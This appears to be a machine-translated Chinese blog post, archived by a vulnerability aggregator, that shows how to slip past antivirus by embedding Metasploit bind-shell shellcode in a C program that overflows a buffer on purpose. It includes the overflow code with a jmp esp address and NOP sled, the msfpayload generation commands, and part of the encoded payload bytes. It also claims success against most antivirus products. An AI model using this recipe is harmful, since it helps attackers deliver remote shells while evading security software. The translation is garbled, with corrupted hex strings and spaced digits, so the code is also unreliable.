By overflow vulnerability to bypass the antivirus protection-vulnerability warning-the black bar safety net

2015-09-04T00:00:00
ID MYHACK58:62201566557
Type myhack58
Reporter 佚名
Modified 2015-09-04T00:00:00

Description

Ideas

By writing a having overflow vulnerability in the program, and the malicious code written into the shellcode, overflow after executing the shellcode can bypass the antivirus protection.

Test environment

Platform: Windows XP SP3

Compiler: VC 6.0

Test code

Construct the following exploit code is loaded shellcode to:

include <stdio. h>

include <string. h>

void overflow( char * input)

{

char buf[ 4 ];

strcpy(buf, input);

}

void main()

{

char shellcode[] = "AAAAAAAA"

"\x7b\x46\x86\x7c" //jmp esp

"\x90\x90\x90\x90"

"\x90\x90\x90\x90"

"\x90\x90\x90\x90"

"\x90\x90\x90\x90"

"\x90\x90\x90\x90"

"shellcode"

"\x90\x90\x90\x90"

"\x90\x90\x90\x90"

"\x90\x90\x90\x90"

"\x90\x90\x90\x90"

"\x90\x90\x90\x90" ;

overflow(shellcode);

}

First, by msfpayload to generate a payload, killing, and found most of the antivirus will be reported Poison:

!

To generate shellcode, and fill in the source code:

msf > use payload/windows/shell/bind_tcp

msf payload(bind_tcp) > generate-b '\x00' -t c

/*

  • windows/shell/bind_tcp - 3 1 2 bytes (stage 1 )

  • http://www.metasploit.com

  • Encoder : x86/shikata_ga_nai

  • VERBOSE = false , LPORT = 4 4 4 4 , RHOST =,

  • PayloadUUIDTracking = false , EnableStageEncoding = false ,

  • StageEncoderSaveRegisters =, StageEncodingFallback = true ,

  • PrependMigrate = false , EXITFUNC =none, InitialAutoRunScript =,

  • AutoRunScript =

*/

unsigned char buf[] =

"\xbd\x81\xf6\x2c\x43\xd9\xe9\xd9\x74\x24\xf4\x58\x31\xc9\xb1"

"\x48\x83\xc0\x04\x31\x68\x0f\x03\x68\x8e\x14\xd9\xbf\x78\x5a"

"\x22\x40\x78\x3b\xaa\xa5\x49\x7b\xc8\xae\xf9\x4b\x9a\the XE3\xf5"

"\x20\xce\x17\x8e\x45\xc7\x18\x27\the XE3\x31\x16\xb8\x58\x01\x39"

······

Compiled found to successfully bypass the majority of antivirus software:

!

Successful return to the shell test with 3 6 0: the

! !

Other

@Sweets said the master of this idea in the 0 to 2 years of age have been proposed, but I don't know why or can use, the estimated reason is that antivirus software is still biased in favor of a static check?

Attached 2 0 0 2 year Xcon on related information: overflow implanted Trojan(back door of the prototype implementation